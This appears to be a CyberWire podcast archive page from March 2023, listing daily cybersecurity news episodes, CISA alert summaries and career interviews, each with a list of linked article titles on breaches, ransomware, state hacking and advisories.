    3CX Confirms Supply Chain Attack as Researchers Uncover Mac Component (SecurityWeek)

    There’s a new supply chain attack targeting customers of a phone system with 12 million users (TechCrunch)

    Super FabriXss: From XSS to an RCE in Azure Service Fabric Explorer by Abusing an Event Tab Cluster Toggle (CVE-2023-23383) (Orca Security)

    Dissecting AlienFox | The Cloud Spammer’s Swiss Army Knife (SentinelOne)


    A major supply chain attack is underway. Ms Connor, call your office. Combosquatting. False positives fixed. Tanks don’t work, so Russia tries more cyber. And, sadly, some official hostage-taking. Mar 30, 2023

    The 3CXDesktopApp is under exploitation in a supply chain campaign. An open letter asks for a pause in advanced AI development. All your grammar and usage are belong to us. Combosquatting might fool even the wary. Defender had flagged Zoom and other safe sites as dangerous. Recognizing the importance of OSINT. Matt O'Neill from US Secret Service discussing his agency’s cybersecurity mission. Our guest is Ping Li from Signifyd with a look at online fraud. And the FSB arrests a US journalist.

    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/61


    Selected reading.

    3CX DesktopApp Security Alert (3CX)

    Supply Chain Attack Against 3CXDesktopApp (CISA)

    Pause Giant AI Experiments: An Open Letter (Future of Life Institute)

    In Sudden Alarm, Tech Doyens Call for a Pause on ChatGPT (WIRED)

    AI chatbots making it harder to spot phishing emails, say experts (the Guardian)

    The Most Common Combosquatting Keyword Is “Support” (Akamai)

    False positives in Microsoft Defender. (CyberWire)

    Exploitation is a Dish Best Served Cold: Winter Vivern Uses Known Zimbra Vulnerability to Target Webmail Portals of NATO-Aligned Governments in Europe (Proofpoint)

    ESET Research Podcast: A year of fighting rockets, soldiers, and wipers in Ukraine (WeLiveSecurity)

    Russia Ramping Up Cyberattacks Against Ukraine (VOA)

    A new age of spying gives Kyiv the upper hand (The Telegraph)

    Russia arrests Wall Street Journal reporter on spying charge (AP NEWS)

    Russia detains a Wall Street Journal reporter, accusing him of espionage. (New York Times)


    Traffers and the threat to credentials. WiFi protocol flaw. Cross-chain bridge attacks. A shift in Russian cyber operations. Piracy is patriotic. Mar 29, 2023

    Traffers and the threat to credentials. A newly discovered WiFi protocol flaw. Cross-chain bridge attacks. A shift in Russian cyber operations. Ann Johnson from Afternoon Cyber Tea chats with EY principal Adam Malone. Our guest is Toni Buhrke from Mimecast with a look at the State of Email Security. And is piracy patriotic?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/60


    Selected reading.

    Traffers and the growing threat against credentials (Outpost24 blog)

    WiFi protocol flaw allows attackers to hijack network traffic (BleepingComputer)

    Cross-chain bridge attacks. (CyberWire)

    2023 Annual State of Email Security Report (Cofense)

    From Ukraine to the whole of Europe: cyber conflict reaches a turning point (Thales Group)

    Russia Ramps Up Cyberattacks On Ukraine Allies: Analysts (Barron's)

    Pro-Russian hackers shift focus from Ukraine to EU countries (Radio Sweden)

    Russian hackers attack Slovak governmental websites after country supplies Mig-29s to Ukraine (Ukrainska Pravda)

    Ukraine's Defense Ministry says Russia is encouraging online piracy (The Jerusalem Post)


    Twitter looks for a leaker. Insider risks. The state of resilience. Russian auxiliaries briefly disrupt a French National Assembly website. Cyber trends in the hybrid war. DPRK hacking, as it is. Mar 28, 2023

    Twitter gets a subpoena for a source-code leaker’s information. The insider risk to data. Russian hacktivist auxiliaries target the French National Assembly. Recent trends in cyberattacks sustained by Ukraine. Ben Yelin unpacks the White House executive order on spyware. Mr. Security Answer Person John Pescatore ponders the permanence of ransomware. And cyberespionage and cybercrime in the interest of Pyongyang’s weapons programs.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/59


    Selected reading.

    GitHub Suspends Repository Containing Leaked Twitter Source Code (SecurityWeek)

    Twitter takes down source code leaked online, hunts for downloaders (BleepingComputer)

    Annual Data Exposure Report 2023 (Code 42)

    Russian Hackers Target French National Assembly Website (Privacy Affairs)

    Pro-Russian Hacktivists: A Reaction to a Western Response to a Russian Aggression (Radware Blog)

    Ukraine at D+397: Cyberespionage and battlespace preparation. (CyberWire)

    APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations (Mandiant)


    Evolution of criminal scams (especially BEC). Law enforcement honeypots. ChatGPT data leak. Hybrid war updates. Mar 27, 2023

    IcedID is evolving away from its banking malware roots. An Emotet phishing campaign spoofs IRS W-9s. The FBI warns of BEC scams. A fake booter service as a law enforcement honeypot. Phishing in China's nuclear energy sector. Reports of an OpenAI and a ChatGPT data leak. Does Iran receive Russian support in cyberattacks against Albania? My conversation with Linda Gray Martin and Britta Glade from RSAC with a preview of this year's conference. Our own Rick Howard takes a field trip to the National Cryptologic Museum. And de-anonymizing Telegram.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/58


    Selected reading.

    Fork in the Ice: The New Era of IcedID (Proofpoint)

    Emotet malware distributed as fake W-9 tax forms from the IRS (BleepingComputer)

    Internet Crime Complaint Center (IC3) | Business Email Compromise Tactics Used to Facilitate the Acquisition of Commodities and Defrauding Vendors (IC3)

    Phishing Campaign Targets Chinese Nuclear Energy Industry (Intezer)

    'Bitter' espionage hackers target Chinese nuclear energy orgs (BleepingComputer)

    UK Sets Up Fake DDoS-for-Hire Sites to Trap Hackers (PCMag Middle East)

    UK National Crime Agency reveals it ran fake DDoS-for-hire sites to collect users’ data (Record)

    OpenAI: ChatGPT payment data leak caused by open-source bug (BleepingComputer)

    OpenAI says a bug leaked sensitive ChatGPT user data (Engadget)

    March 20 ChatGPT outage: Here’s what happened (OpenAI)

    How Albania Became a Target for Cyberattacks (Foreign Policy)

    Russia’s Rostec allegedly can de-anonymize Telegram users (BleepingComputer)


    An introduction to the National Cryptologic Museum. [Special Edition] Mar 27, 2023

    Rick Howard, N2K’s CSO and The CyberWire’s Chief Analyst and Senior Fellow, sits down with Director of the National Cryptologic Museum, Dr. Vince Houghton. The National Cryptologic Museum is the NSA's affiliated museum sharing the nation's best cryptologic secrets with the public. In this special episode, Rick interviews Dr. Houghton from within the walls of the National Cryptologic Museum, discussing the new and improved museum along with the new exhibits they uncovered during the pandemic.


    Two viewpoints on the National Cybersecurity Strategy. [Special Edition] Mar 26, 2023

    Earlier this month, the White House released the National Cybersecurity Strategy, the first issued since 2018. The strategy refocuses roles, responsibilities, and resource allocations in the digital ecosystem, with a five pillar approach. Those pillars are: defending critical infrastructure, disrupting threat actors, shaping market forces to drive security and resilience, investing in a resilient future, and forging international partnerships.

    We wanted to delve into the strategy and its intended effects further, so Dave Bittner spoke with representatives from industry and inside government. Dave first speaks with Adam Isles, Principal and Head of Cybersecurity Practice at The Chertoff Group, sharing industry's take on the strategy. Following that conversation, Dave had a discussion with Steve Kelly, Special Assistant to the President and Senior Director for Cybersecurity and Emerging Technology at the National Security Council, for a look at the strategy from inside the White House.

    Links to resources:

    • Point of View: 2023 National Cybersecurity Strategy The Chertoff Group's blog
    • National Cybersecurity Strategy 2023

    Tanya Janca: Find a community who supports you. [CEO] [Career Notes] Mar 26, 2023

    Tanya Janca, CEO and Founder of We Hack Purple, sits down to talk about her exciting path into the field of cybersecurity. Trying several different paths in high school, she soon found she was good at computer science. When it came to picking a college, she knew that was the field she wanted to get into. After college, she was able to use her skills to work at a couple of different organizations, eventually getting into the Canadian government. While there, she held the position of CISO for the Canadian election in 2015 when Justin Trudeau was elected, but she knew she wanted to try something new. She switched from programming to security and after working at Microsoft as a presenter, she eventually found that she wanted to start her own company, saying "at first it was just me presenting, but now we have community members present to each other and it's just been really beautiful to see that grow." She hopes that with her and her community's help, nobody is left feeling unsafe when it comes to being online.


    Popunders are not the good kind of ads. [Research Saturday] Mar 25, 2023

    On this episode, Jérôme Segura, senior threat researcher at Malwarebytes, shares his team's work, "WordPress sites backdoored with ad fraud plugin." WordPress is an immensely popular content management system (CMS) powering over 43% of all websites. Many webmasters will monetize their sites by running ads and need to draw particular attention to search engine optimization (SEO) techniques to maximize their revenues.

    The Malwarebytes team discovered a few dozen WordPress blogs using the same plugin that mimics human activity by automatically scrolling a page and following links within it, all the while a number of ads were being loaded and refreshed. The blogs would only exhibit this invalid traffic behavior when launched from a specific URL created by this plugin, otherwise they appeared completely legitimate.

    The research can be found here:

    • WordPress sites backdoored with ad fraud plugin

    Tools, alerts, and advisories from CISA. Reply phishing scams. Cl0p goes everywhere with GoAnywhere. EW in the hybrid war, and shields stay up. Mar 24, 2023

    A CISA tool helps secure Microsoft clouds. JCDC and pre-ransomware notification. CISA releases six ICS advisories. Reply phishing. Cl0p goes everywhere exploiting GoAnywhere. Russian electronic warfare units show the ability to locate Starlink terminals. Betsy Carmelite from Booz Allen Hamilton on the DoD's zero trust journey. Analysis of the National Cybersecurity Strategy from our special guests, Adam Isles, Principal at the Chertoff Group, and Steve Kelly, Special Assistant to the President and Senior Director for Cybersecurity and Emerging Technology with the National Security Council.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/57


    Selected reading.

    JCDC Cultivates Pre-Ransomware Notification Capability (Cybersecurity and Infrastructure Security Agency CISA)

    US cyber officials make urgent push to warn businesses about vulnerabilities to hackers (CNN)

    Untitled Goose Tool Aids Hunt and Incident Response in Azure, Azure Active Directory, and Microsoft 365 Environments | CISA (Cybersecurity and Infrastructure Security Agency CISA)

    New CISA tool detects hacking activity in Microsoft cloud services (BleepingComputer)

    CISA Releases Six Industrial Control Systems Advisories (Cybersecurity and Infrastructure Security Agency CISA)

    The Microsoft Reply Attack (Avanan)

    More victims emerge from Fortra GoAnywhere zero-day attacks (Security |

    More Clop GoAnywhere attack victims emerge (SC Media)

    Mass-Ransomware Attack on GoAnywhere File Transfer Tool Exposes Companies Worldwide (Medium)

    City of Toronto confirms data theft, Clop claims responsibility (BleepingComputer)

    Canadian movie chain Cineplex among the victims of GoAnywhere MFT hack (Financial Post)

    Personal data of Rio Tinto's Aussie staff may have been hacked - memo (Reuters)

    Another GoAnywhere Attack Affects Japanese Giant Hitachi Energy (Heimdal Security Blog)

    Using Starlink Paints a Target on Ukrainian Troops (Defense One)

    As CISA chief notes lack of Russian cyberattacks against US, experts focus on enhancing nuclear reactor security (Utility Dive)

    Using Deception to Learn About Russian Threat Actors (Security Boulevard)


    Pyongyang’s intelligence services have been busy in cyberspace. Hacktivists exaggerate the effects of their attacks on OT. Ghostwriter is back. A twice-told tale: ineffective cyberwar campaigns. Mar 23, 2023

    DPRK threat actor Kimsuky uses a Chrome extension to exfiltrate emails, while ScarCruft prospects South Korean organizations. Hacktivists' claims of attacks on OT networks may be overstated. Ghostwriter remains active in social engineering attempts to target Ukrainian refugees. Joe Carrigan has cyber crime by the numbers. Our guest is Christian Sorensen from SightGain with analysis of the cyber effects of Russia’s war.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/56


    Selected reading.

    North Korean hackers using Chrome extensions to steal Gmail emails (BleepingComputer)

    Joint Cyber Security Advisory (Korean) (BundesamtfuerVerfassungsschutz)

    North Korean APT group ‘Kimsuky’ targeting experts with new spearphishing campaign (Record)

    ScarCruft's Evolving Arsenal: Researchers Reveal New Malware Distribution Techniques (The Hacker News)

    The Unintentional Leak: A glimpse into the attack vectors of APT37 (Zscaler)

    CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) (ASEC BLOG)

    A Propaganda Group is Using Fake Emails to Target Ukrainian Refugees (Bloomberg)

    We (Did!) Start the Fire: Hacktivists Increasingly Claim Targeting of OT Systems | Mandiant (Mandiant)

    Fact or fiction, hacktivists' claims of industrial sabotage in Russia or Ukraine get attention online (CyberScoop)

    The 5×5—Conflict in Ukraine's information environment (Atlantic Council)

    How the Russia-Ukraine conflict has impacted cyber-warfare (teiss)

    CommonMagic APT gang attacking organisations in Ukraine (Tech Monitor)


    Detecting sandbox emulations. VEC supply chain attacks. Updates from the hybrid war. CISA and NSA offer IAM guidance. Other CISA advisories. Baphomet gets cold feet after all. Mar 22, 2023

    Malware could detect sandbox emulations. A VEC supply chain attack. A new APT is active in Russian-occupied sections of Ukraine. An alleged Russian patriot claims responsibility for the D.C. Health Link attack. CISA and NSA offer guidance on identity and access management (IAM). Tim Starks from the Washington Post has analysis on the BreachForums takedown. Our guest is Ryan Heidorn from C3 Integrated Solutions with a look at the CMMC compliance timeline. And Baphomet backs out.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/55


    Selected reading.

    ZenGo uncovers security vulnerabilities in popular Web3 Transaction Simulation solutions: The red pill attack (ZenGo)

    Stopping a $36 Million Vendor Fraud Attack (Abnormal Intelligence)

    Bad magic: new APT found in the area of Russo-Ukrainian conflict (Securelist)

    Unknown actors target orgs in Russia-occupied Ukraine (Register)

    New 'Bad Magic' Cyber Threat Disrupt Ukraine's Key Sectors Amid War (The Hacker News)

    Partisan suspects turn on the cyber-magic in Ukraine (Cybernews)

    Hacker tied to D.C. Health Link breach says attack 'born out of Russian patriotism' (CyberScoop)

    CISA and NSA Release Enduring Security Framework Guidance on Identity and Access Management | CISA (Cybersecurity and Infrastructure Security Agency CISA)

    ESF Partners, NSA, and CISA Release Identity and Access Management Recommended Best Practi (National Security Agency/Central Security Service)

    Identity and Access Management: Recommended Best Practices for Administrators (NSA and CISA)

    CISA Releases Updated Cybersecurity Performance Goals (Cybersecurity and Infrastructure Security Agency CISA)

    CISA Releases Eight Industrial Control Systems Advisories | CISA (Cybersecurity and Infrastructure Security Agency CISA)

    End of BreachForums could take a bite out of cybercrime (Washington Post)

    BreachForums says it is closing after suspected law enforcement access to backend (Record)


    Threat group with novel malware operates in SE Asia. Data theft extortion rises. Key findings of Cisco's Cybersecurity Readiness Index. iPhones no longer welcome in Kremlin. Russian cyber auxiliaries & privateers devote increased attention to healthcare. Mar 21, 2023

    Threat group with novel malware operates in Southeast Asia. Data theft extortion on the rise. Key findings of Cisco's Cybersecurity Readiness Index. iPhones are no longer welcome in the Kremlin. Russian cyber auxiliaries and privateers devote increased attention to the healthcare sector. Chris Eng from Veracode shares findings of their Annual Report on the State of Application Security. Johannes Ullrich from SANS Institute discusses scams after the failure of Silicon Valley Bank. And BreachForums seems to be under new management.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/54


    Selected reading.

    NAPLISTENER: more bad dreams from developers of SIESTAGRAPH (Elastic Blog)

    Unit 42 Ransomware and Extortion Report Highlights: Multi-Extortion Tactics Continue to Rise (Palo Alto Network)

    Ransomware and extortion trends. (CyberWire)

    Cisco Cybersecurity Readiness Index (Cisco)

    A look at resilience: companies' ability to fight off cyberattacks. (CyberWire)

    Putin to staffers: throw out your iPhones over security (Register)

    Black Basta, Killnet, LockBit groups targeting healthcare in force (SC Media)

    After BreachForums arrest, new site administrator says the platform will live on (Record)


    Cl0p ransomware at Hitachi Energy. Alleged TikTok surveillance of journalists. Hacktivist auxiliary hits Indian healthcare records. Cyberattack on Latitude: update. BreachForums arrest. Mar 20, 2023

    Cl0p ransomware hits Hitachi Energy. The US Department of Justice investigates ByteDance in alleged surveillance of journalists. A hacktivist auxiliary hits Indian healthcare records. Pirated software is used to carry malware. The effects of the cyberattack on Latitude persist. Adam Meyers from CrowdStrike shares findings from the 2023 CrowdStrike Global Threat Report. Rick Howard has the latest preview of CSO Perspectives. And Pompompurin is arrested for an alleged role in BreachForums.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/53


    Selected reading.

    Hitachi Energy confirms data breach after Clop GoAnywhere attacks (BleepingComputer)

    Hitachi Energy Group hit by cyber-attack, says network operations not compromised (cnbctv18.com)

    Justice Department Probes TikTok’s Tracking of U.S. Journalists (Wall Street Journal)

    The FBI And DOJ Are Investigating ByteDance’s Use Of TikTok To Spy On Journalists (Forbes)

    KillNet and affiliate hacktivist groups targeting healthcare with DDoS attacks (Azure Network Security Team)

    Pro-Russia hackers are increasingly targeting hospitals, researchers warns (Record)

    Russian hacktivist group targets India’s health ministry (CSO Online)

    Russian Hacktivist group Phoenix targets India’s Health Ministry Website (Threat Intelligence | CloudSEK)

    Ukraine warns that hacked software can be infected with Russian viruses (Kyiv Independent)

    Russian hackers spread infected software through torrents (SSSCIP)

    Australia's Latitude takes systems offline, Federal Police investigate cyberattack (Reuters)

    FBI targets notorious cybercrime market with teen’s arrest (Washington Post)

    Dark Web ‘BreachForums’ Operator Charged With Computer Crime (Bloomberg)

    Feds arrest alleged BreachForums owner linked to FBI hacks (The Verge)

    NY Man Charged as 'Pompompurin,' the Boss of BreachForums (KrebsOnSecurity)

    Breach Forums Admin 'Pompompurin' Arrested in New York (Cyber Kendra)

    Pompompurin Unmasked: Infamous BreachForums Mastermind Arrested in New York (The Hacker News)


    Kathleen Smith: Translating the cyber world. [CMO] [Career Notes] Mar 19, 2023

    Kathleen Smith, CMO from ClearedJobs.Net, sits down to share her story as she remembers having big shoes to fill in her childhood. She strived for greatness at an early age, as her parents told her she would be going to college and would follow strong guidelines to become successful. Kathleen can remember being into the hard sciences when she was in school, which sparked an interest in becoming a biochemist and law student. Eventually she found her passion as a translator, saying that "doing the translator role, I wanted to get into international marketing and I was going on to get my degree on that." She found her way to ClearedJobs.Net and fell in love with it. She had sought a workplace that wouldn't burn her out, where she could also be part of the team. Kathleen found what she was passionate about and made it a reality for herself, and now she just wants young women starting in the field to know the importance of finding something they are passionate about. We thank Kathleen for sharing her story.


    CISA Alert AA23-075A – #StopRansomware: LockBit 3.0. Mar 18, 2023

    CISA, FBI, and the Multi-State Information Sharing and Analysis Center are releasing this joint advisory to share known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.

    AA23-075A Alert, Technical Details, and Mitigations

    Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.

    Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    ChatGPT grants malicious wishes? [Research Saturday] Mar 18, 2023

    Bar Block, Threat Intelligence Researcher at Deep Instinct, joins Dave to discuss their work on "ChatGPT and Malware - Making Your Malicious Wishes Come True." Deep Instinct goes into depth on just how dangerous ChatGPT can be in the wrong hands as well as how artificial intelligence is better at creating malware than providing ways to detect it.

    Researchers go on to explain how the AI app can be used in the wrong hands, saying "Examples of malicious content created by the AI tool, such as phishing messages, information stealers, and encryption software, have all been shared online."

    The research can be found here:

    • ChatGPT and Malware: Making Your Malicious Wishes Come True

    Some movement in the cyber underworld. Vishing impersonates the US Social Security Administration. More SVB-themed phishing. And compromise without user interaction. Mar 17, 2023

    BianLian gang’s pivot. HinataBot is a Go-based threat. The US Social Security Administration is impersonated in attempted vishing attacks. BlackSnake in the RaaS criminal market. More Silicon Valley Bank-themed phishing. Caleb Barlow from Cylete on security implications you need to consider now about ChatGPT. Our guest is Isaac Roth from LeakSignal with advice on securing the microservices application layer. And Russian operators exploit an Outlook vulnerability.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/52


    Selected reading.

    BianLian Ransomware Gang Continues to Evolve ([redacted])

    Uncovering HinataBot: A Deep Dive into a Go-Based Threat (Akamai)

    Social InSecurity: Armorblox Stops Attack Impersonating Social Security Administration (Armorblox)

    Netskope Threat Coverage: BlackSnake Ransomware (Netskope)

    Fresh Phish: Silicon Valley Bank Phishing Scams in High Gear (INKY)

    Outlook zero day linked to critical infrastructure attacks (Cybersecurity Dive)

    CVE-2023-23397: Exploitations in the Wild – What You Need to Know (Deep Instinct)

    Everything We Know About CVE-2023-23397 (Huntress)

    Microsoft Mitigates Outlook Elevation of Privilege Vulnerability (Microsoft Security Response Center)


    CISA warns of Telerik vulnerability exploitation. Cloud storage re-up attacks. Phishing tackle so convincing it will deceive the many. Cyber developments in Russia's hybrid war. Mar 16, 2023

    Telerik exploited, for carding (probably) and other purposes. Cloud storage re-up attacks. Cybercriminals use new measures to avoid detection of phishing campaigns. "Winter Vivern" seems aligned with Russian objectives. Microsoft warns of a possible surge in Russian cyber operations. Boss Sandworm. Johannes Ullrich from SANS talking about malware spread through Google Ads. Our guest is David Anteliz from Skybox Security with thoughts on federal government cybersecurity directives. And don't fear the Reaper.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/51


    Selected reading.

    Threat Actors Exploited Progress Telerik Vulnerability in U.S. Government IIS Server (Cybersecurity and Infrastructure Security Agency CISA)

    Threat Actors Exploit Progress Telerik Vulnerability in U.S. Government IIS Server | CISA (Cybersecurity and Infrastructure Security Agency CISA)

    CISA: Federal civilian agency hacked by nation-state and criminal hacking groups (CyberScoop)

    US govt web server attacked by 'multiple' criminal gangs (Register)

    The Cloud Storage Re-Up Attack (Avanan)

    Threat Spotlight: 3 novel phishing tactics (Barracuda)

    Winter Vivern | Uncovering a Wave of Global Espionage (SentinelOne)

    Is Russia regrouping for renewed cyberwar? (Microsoft On the Issues)

    A year of Russian hybrid warfare in Ukraine (Microsoft Threat Intelligence)

    Russian hackers preparing new cyber assault against Ukraine - Microsoft report (Reuters)

    Microsoft Warns Russia May Plan More Ransomware Attacks Beyond Ukraine (Bloomberg)

    This Is the New Leader of Russia's Infamous Sandworm Hacking Unit (WIRED)

    What's known and not about US drone-Russian jet encounter (AP NEWS)

    Russia tries to retrieve downed US drone in Black Sea (The Telegraph)

    Downed U.S. drone points to cyber vulnerabilities (Washington Post)


    CISA Alert AA23-074A – Threat actors exploit Progress Telerik vulnerability in U.S. government IIS server. [CISA Cybersecurity Alerts] Mar 16, 2023

    CISA, FBI, and the Multi-State Information Sharing and Analysis Center are releasing this joint Cybersecurity Advisory to provide IT infrastructure defenders with TTPs, IOCs, and methods to detect and protect against recent exploitation against Microsoft Internet Information Services web servers.

    AA23-074A Alert, Technical Details, and Mitigations

    AA23-074A STIX XML

    MAR-10413062-1.v1 Telerik Vulnerability in U.S. Government IIS Server

    Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)

    ACSC Advisory 2020-004

    Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI

    Volexity Threat Research: XE Group

    GitHub: Proof-of-Concept Exploit for CVE-2019-18935

    Microsoft: Configure Logging in IIS

    GitHub: CVE-2019-18935

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    Patch Tuesday notes. SVB and the cybersecurity sector. SVR's APT29 is phishing for access to information. Trends in the Russo-Ukraine cyberwar. LockBit counts coup (says LockBit). Mar 15, 2023

    Patch Tuesday notes. Silicon Valley Bank's collapse and its effects on the cybersecurity sector. SVR's APT29 used a Polish state visit to the US as phishbait. Regularizing hacktivist auxiliaries. Our guest is Crane Hassold from Abnormal Security with a look at threats to email. Grayson Milbourne from OpenText Cybersecurity addresses chaos within the supply chain. And LockBit claims to have compromised an aerospace supply chain.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/50


    Selected reading.

    March 2023 Patch Tuesday: Updates and Analysis (CrowdStrike)

    Microsoft Releases March 2023 Security Updates (Cybersecurity and Infrastructure Security Agency CISA)

    Adobe Releases Security Updates for Multiple Products (Cybersecurity and Infrastructure Security Agency CISA)

    Mozilla Releases Security Updates for Firefox 111 and Firefox ESR 102.9 (Cybersecurity and Infrastructure Security Agency CISA)

    SAP Security Patch Day for March 2023 (Onapsis)

    March Patch Tuesday review. (CyberWire)

    What the collapse of Silicon Valley Bank means for cyber and the tech startup ecosystem. (CyberWire)

    NOBELIUM Uses Poland's Ambassador’s Visit to the U.S. to Target EU Governments Assisting Ukraine (BlackBerry)

    Ukraine Tracks Increased Russian Focus on Cyberespionage (Bank Info Security)

    Ukraine scrambles to draft cyber law, legalizing its volunteer hacker army (Newsweek)

    Ransomware Group Claims Theft of Valuable SpaceX Data From Contractor (SecurityWeek)


    Silicon Valley Bank as phishbait. An “attack superhighway.” Unauthorized software in the workplace. YoroTrooper, a new cyberespionage threat actor. Hacktivists game, too. How crime pays. Mar 14, 2023

    Expect phishing, BEC scams, and other social engineering to use Silicon Valley Bank lures. An "attack superhighway." Unauthorized software in the workplace. A new cyberespionage group emerges. Squad up (but not IRL). Ben Yelin unpacks the FBI director’s recent admission of purchasing location data. Ann Johnson from Afternoon Cyber Tea speaks with Jason Barnett from HCA Healthcare about cyber resilience. And, not that you’d consider a life of crime, but what are the gangs paying cyber criminals, nowadays?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/49


    Selected reading.

    SVB's collapse and the potential for fraud. (CyberWire)

    State-of-the-Internet: malicious DNS traffic. (CyberWire)

    Unauthorized software in the workplace. (CyberWire)

    Talos uncovers espionage campaigns targeting CIS countries, including embassies and EU health care agency (Cisco Talos Blog)

    STALKER 2 game developer hacked by Russian hacktivists, data stolen (BleepingComputer)

    GSC Game World suffers Stalker 2 leak after latest cyber attack (GamesIndustry.biz)

    Threat Groups Offer $240k Salary to Tech Jobseekers (Security Intelligence)


    Coping with Silicon Valley Bank's collapse. BatLoader's abuse of Google Search Ads. More on Emotet’s re-emergence. Medusa rising. NetWire collared. More-or-less quiet on the cyber front. Mar 13, 2023

    Coping with Silicon Valley Bank's collapse. BatLoader is abusing Google Search Ads. More on Emotet’s re-emergence. Reflections on Medusa rising. An international law enforcement action against NetWire. Rob Shapland from Falanx Cyber on ethical hacking and red teaming. Bryan Ware from LookingGlass looks at exploited vulnerabilities in the US financial sector. And in Ukraine, it’s more-or-less quiet on the cyber front (but in Estonia and Georgia, not so much).


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/48


    Selected reading.

    One of Silicon Valley's top banks fails; assets are seized (AP NEWS)

    US, UK try to stem fallout from Silicon Valley Bank collapse (AP NEWS)

    In abrupt reversal, regulators to cover Silicon Valley Bank, Signature uninsured deposits (American Banker)

    Silicon Valley Bank collapse will not trigger new financial crisis, insists Sunak (The Telegraph)

    ‘Banking system is safe’: Joe Biden reassures markets in address on Silicon Valley Bank collapse – live updates (the Guardian)

    BatLoader Continues to Abuse Google Search Ads to Deliver Vidar Stealer and Ursnif (eSentire)

    BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads (The Hacker News)

    Emotet Again! The First Malspam Wave of 2023 (Deep Instinct)

    Emotet attempts to sell access after infiltrating high-value networks (SC Media)

    Medusa ransomware gang picks up steam as it targets companies worldwide (BleepingComputer)

    Alleged seller of NetWire RAT arrested in Croatia (Help Net Security)

    FBI and international cops catch a NetWire RAT (Register)

    How the FBI proved a remote admin tool was actually malware (TechCrunch)

    Estonia’s Election Was More Than Just a Win for Kallas (World Politics Review)

    Estonian official says parliamentary elections were targeted by cyberattacks (Record)


    Bat El Azerad: Find your niche to bring to the table. [CEO] [Career Notes] Mar 12, 2023

    Bat El Azerad, CEO and Co-founder of mobile phishing protection company novoShield, shares her personal account of her experience as a female leader in the cybersecurity field as well as some insights into how far the industry has come and where it is headed in terms of the gender gap. Bat El speaks about how she grew into her role of becoming a CEO, by sharing where she started and how she got involved with novoShield. She shares that being a woman in this industry can be tough, and so she offers some advice, saying "so you have to be very focused and to find the right niche to bring something to the table because the competition in this industry and the level of innovation, um, is, is great." Bat El hopes that, throughout her time in the industry, people remember her for her vision and the mission she is helping to create and maintain at her company. We thank Bat El for sharing her story.


    Files stolen from a sneaky SymStealer. [Research Saturday] Mar 11, 2023

    Ron Masas of Imperva discusses their work, the "Google Chrome “SymStealer” Vulnerability. How to Protect Your Files from Being Stolen." By reviewing the ways the browser handles file systems, specifically searching for common vulnerabilities relating to how browsers process symlinks, the Imperva Red Team discovered that when files are dropped onto a file input, it’s handled differently.

    Dubbed CVE-2022-40764, the vulnerability the researchers found "allowed for the theft of sensitive files, such as crypto wallets and cloud provider credentials." As a result, over 2.5 billion users of Google Chrome and Chromium-based browsers were affected.

    The research can be found here:

    • Google Chrome “SymStealer” Vulnerability: How to Protect Your Files from Being Stolen

    Cybercrime and cyberespionage: IceFire, DUCKTAIL, LIGHTSHOW, Remcos, and a tarot card reader. US cyber budgets, strategy, and a DoD cyber workforce approach. Five new ICS advisories. Mar 10, 2023

